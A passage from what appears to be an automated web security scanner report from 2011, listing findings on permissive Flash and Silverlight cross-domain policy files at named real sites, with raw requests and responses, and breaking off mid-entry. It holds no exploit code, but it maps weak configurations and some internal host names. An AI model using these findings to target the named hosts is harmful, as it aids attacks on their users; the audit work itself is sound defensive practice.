The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sat, 07 May 2011 01:21:32 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...
6.46. http://expedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: expedia.com

Response

HTTP/1.1 200 OK
Content-Length: 1950
Content-Type: text/xml
Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0b4401147e6ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close

...<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy>
<cross-domain-policy>
<allow-access-from domain="*.expedia.ca" secure="true" />
<allow-access-from domain="*.expedia.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="content.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ads.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="media.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.it" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.nl" secure="true" />
...[SNIP]...
<allow-access-from domain=" www.expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.hotels.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotwire.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tripadvisor.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte4.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte5.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte7.com" secure="true" />
...[SNIP]...
<allow-access-from domain="labadssrv01" secure="true" />
...[SNIP]...
<allow-access-from domain="labadsol01" secure="true" />
...[SNIP]...
<allow-access-from domain="10.95.1.5" secure="true" />
...[SNIP]...
<allow-access-from domain="belwaweb01" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="true" />
...[SNIP]...
6.47. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 06 May 2011 16:06:51 GMT
Expires: Sat, 07 May 2011 16:06:51 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 14510
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
6.48. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Fri, 06 May 2011 22:33:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
6.49. http://suth.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://suth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: suth.com

Response

HTTP/1.1 200 OK
Content-Length: 335
Content-Type: text/xml
Last-Modified: Mon, 04 Oct 2010 02:51:14 GMT
Accept-Ranges: bytes
ETag: "d8efc226f63cb1:1ad01"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:55:17 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*.suth.com" secure="false" />
<allow-access-from domain="*.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sutherlandglobal.com" secure="false" />
...[SNIP]...
6.50. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sat, 07 May 2011 01:19:19 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...
6.51. http://www.advancedaccess.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.advancedaccess.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 18:39:47 GMT
Content-Length: 353
Content-Type: text/xml
Last-Modified: Wed, 11 Feb 2009 18:21:27 GMT
Accept-Ranges: bytes
ETag: "edf188e758cc91:586"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.advancedaccess.com/fobj/loader.swf" />
<allow-access-from domain="*.com" />
<allow-access-from domain="http://office.advancedaccess.com" />
...[SNIP]...
6.52. http://www.expedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Content-Length: 1950
Content-Type: text/xml
Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0b4401147e6ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close

...<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy>
<cross-domain-policy>
<allow-access-from domain="*.expedia.ca" secure="true" />
<allow-access-from domain="*.expedia.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="content.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ads.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="media.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.it" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.nl" secure="true" />
...[SNIP]...
<allow-access-from domain=" www.expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.hotels.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotwire.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tripadvisor.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte4.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte5.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte7.com" secure="true" />
...[SNIP]...
<allow-access-from domain="labadssrv01" secure="true" />
...[SNIP]...
<allow-access-from domain="labadsol01" secure="true" />
...[SNIP]...
<allow-access-from domain="10.95.1.5" secure="true" />
...[SNIP]...
<allow-access-from domain="belwaweb01" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="true" />
...[SNIP]...
6.53. https://www.expedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Content-Length: 1950
Content-Type: text/xml
Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0b4401147e6ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: close

...<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy>
<cross-domain-policy>
<allow-access-from domain="*.expedia.ca" secure="true" />
<allow-access-from domain="*.expedia.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="content.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ads.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="media.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.it" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.nl" secure="true" />
...[SNIP]...
<allow-access-from domain=" www.expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.hotels.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotwire.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tripadvisor.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte4.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte5.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte7.com" secure="true" />
...[SNIP]...
<allow-access-from domain="labadssrv01" secure="true" />
...[SNIP]...
<allow-access-from domain="labadsol01" secure="true" />
...[SNIP]...
<allow-access-from domain="10.95.1.5" secure="true" />
...[SNIP]...
<allow-access-from domain="belwaweb01" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="true" />
...[SNIP]...
6.54. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.99.118
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
6.55. http://www.scmagazineus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 21 Sep 2009 15:39:52 GMT
Accept-Ranges: bytes
ETag: "6cd10c3d13aca1:0"
Server: Microsoft-IIS/7.5
From: Web2-VM
Date: Fri, 06 May 2011 21:49:55 GMT
Connection: close
Content-Length: 292

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...
6.56. http://extras.expedia.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: extras.expedia.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 12 Apr 2010 17:22:20 GMT
Accept-Ranges: bytes
ETag: "cc1ebb464daca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Fri, 06 May 2011 22:36:33 GMT
Connection: close
Content-Length: 475

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="travelhook.com" />
   <allow-access-from domain="test.travelhook.com" />
...[SNIP]...
7. Silverlight cross-domain policy  previous  next
There are 14 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://a.rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:07 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
7.2. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Fri, 06 May 2011 21:50:02 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.3. http://b.rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:07 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
7.4. http://c.scout.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 06 May 2011 19:29:07 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...
7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
